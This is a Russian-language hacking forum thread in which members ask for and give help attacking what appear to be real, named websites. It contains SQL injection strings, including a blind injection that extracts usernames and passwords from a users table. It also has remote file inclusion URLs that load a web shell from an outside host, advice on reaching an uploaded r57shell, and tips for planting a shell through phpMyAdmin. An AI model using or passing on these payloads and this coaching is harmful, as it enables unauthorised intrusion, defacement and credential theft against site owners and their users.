Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. big_BRAT

    big_BRAT Elder - Старейшина

    Joined:
    23 Dec 2006
    Messages:
    77
    Likes Received:
    64
    Reputations:
    7
    нужно просто отрезать лишнее
    _http://www.privateurl.com/index.php?trans_lang=eng&langid=&username=user'+or+password=1/*
     
  2. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    все равно донт акссес

    заодно если не тяжело посмотрите плиз вот
    я все унионы перепробовал до 34-го, чет никакого результата.

     
  3. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Мор1ров заюзай

    http://www.privateurl.com/index.php?trans_lang=eng&langid=&username=user'+and+if(ascii(substring((select+concat_ws(0x2F,username,password)+from+users+limit+0,1),1,1))>1,1,(select+1+union+select+2))=1--+

    А доступа нет возможно потому что ты не авторизирован. Попробуй зарегиться
     
  4. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Не, ну это я знаю...
    Я видел такую фиговину, с названием RFI SQL INJ которая выглядила как то так:

    http://www.centralpets.com/php/search/storiesdisplay.php?Story='83
    http://www.centralpets.com/php/search/storiesdisplay.php?Story=\'83
    http://www.centralpets.com/php/search/storiesdisplay.php?Story=%00'83
    http://www.centralpets.com/php/search/storiesdisplay.php?Story="83
    http://www.centralpets.com/php/search/storiesdisplay.php?Story=%3D83
    http://www.centralpets.com/php/search/storiesdisplay.php?Story=%252783
    http://www.centralpets.com/php/search/storiesdisplay.php?Story='"83
    http://www.centralpets.com/php/search/storiesdisplay.php?Story=\"83
    http://www.centralpets.com/php/search/storiesdisplay.php?Story="+and+1=0+--+83
    http://www.centralpets.com/php/search/storiesdisplay.php?Story=)83
     
  5. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    -m0rgan-, всё что видно по твоему логу, это попытка подобрать то какой вид кавычки нужен, нужна ли закрывающая скобка или не нужна вообще. (Да и то както криво с учётом того, где находится число 83)

    З.Ы.
    К RFI отношения не имеет.
     
    #6905 Qwazar, 6 May 2009
    Last edited: 6 May 2009
  6. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Ясн, просто наткнулся на на эту фигню и ей кто то присвоил название RFI скуль нижект...
     
  7. AET

    AET New Member

    Joined:
    17 Mar 2008
    Messages:
    23
    Likes Received:
    1
    Reputations:
    -2
    подскажите новичку залил шель r57shell 1.3 как теперь его запустить и еще что означает иньекция и инклуд
     
  8. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Чтобы запустить шелл, проследуй в ту директорию, в которую ты его залил, например ты заливаешь его в папку tmp, то гуляй по адресу www.site.com/tmp/shell.php.
    SQL-Injection – внедрение произвольного SQL-кода в исполняемый запрос
    PHP-include – возможность включения произвольного PHP-кода в исполняемый поток на стороне сервера.
     
  9. AET

    AET New Member

    Joined:
    17 Mar 2008
    Messages:
    23
    Likes Received:
    1
    Reputations:
    -2
    здесь прочитал что шель можно залить и так http://wow.alania.net/?page=http://site.ru/shell.php если да то как его запустить если можете какую шель посаветуете если можно еще сылку на шели
     
  10. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Аааа, если так, то шелл отобразится по этом же адресу, то есть ты инклудишь свой шелл, на эту же страницу (http://wow.alania.net/?page=)

    Пример:
    Code:
    http://www.jiznicechy.org/en/index.php?path=http://forum.antichat.ru
     
    #6910 -m0rgan-, 6 May 2009
    Last edited: 6 May 2009
  11. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    -m0rgan-, плохой пример. Тут не инклюд, а фрейм.
     
  12. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    В общем у меня вопрос следующего рода:
    есть сайт и есть доступ к phpmyadmin-у а когда пытаюсь залить шелл с помощью конструкции select into outfile выдает такой ответ #1045 - Access denied for user… собственно вопрос – что это значит? это типа у юзера не хватает прав или что? И что с этим можно сделать? И может, есть какой то другой способ залить шелл через phpmyadmin-а???
     
  13. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    >>что это значит?
    Да, у юзера нет прав.

    >>что с этим можно сделать
    Зайти под юзером у которого есть права

    >>может, есть какой то другой способ залить шелл через phpmyadmin-а
    Если нет прав на запись, то нет

    Add:
    Есть ещё уязвимости самого пыхадмина:
    https://forum.antichat.ru/thread50669.html
    Возможно тебе повезёт :)
     
    #6913 Kakoytoxaker, 6 May 2009
    Last edited: 6 May 2009
    2 people like this.
  14. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    сенкс!
     
  15. Serge24

    Serge24 Banned

    Joined:
    6 May 2009
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Как это можно использовать?
    /index.php?act=calendar&code=birthdays&y=2009&m=5&d=4
    # user12 (19)
    # user45 (21)
    # user545 (17)
    # user74 (22)
    /index.php?act=calendar&code=birthdays&y[]=2009&m=5&d=4
    # user587 (-1989)
    # user577 (-1987)
    # user5774 (-1991)
    # user5546 (-1986)
     
  16. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Поскажите как пользоваться?

    http://wow.alania.net/?page=


    Warning: include(./inc/.php) [function.include]: failed to open stream: No such file or directory in Y:\home\78.110.144.12\www\index.php on line 104

    Warning: include() [function.include]: Failed opening './inc/.php' for inclusion (include_path='.;/usr/local/php5/PEAR') in Y:\home\78.110.144.12\www\index.php on line 104
     
  17. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    как-как, молча:

    http://forum.antichat.ru/thread12123.html
     
  18. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Почему не сробатывает???

    http://wow.alania.net/?page=http://gef48.narod.ru/antichat
     
  19. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    потому что локальный инклуд, LFI:

    ./inc/ в начале стоит, видишь? http уже не проканает
     
    1 person likes this.
  20. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    А это что занчит? Ничего не зделаешь?
    С нулевым тоже не канает!
     
Thread Status:
Not open for further replies.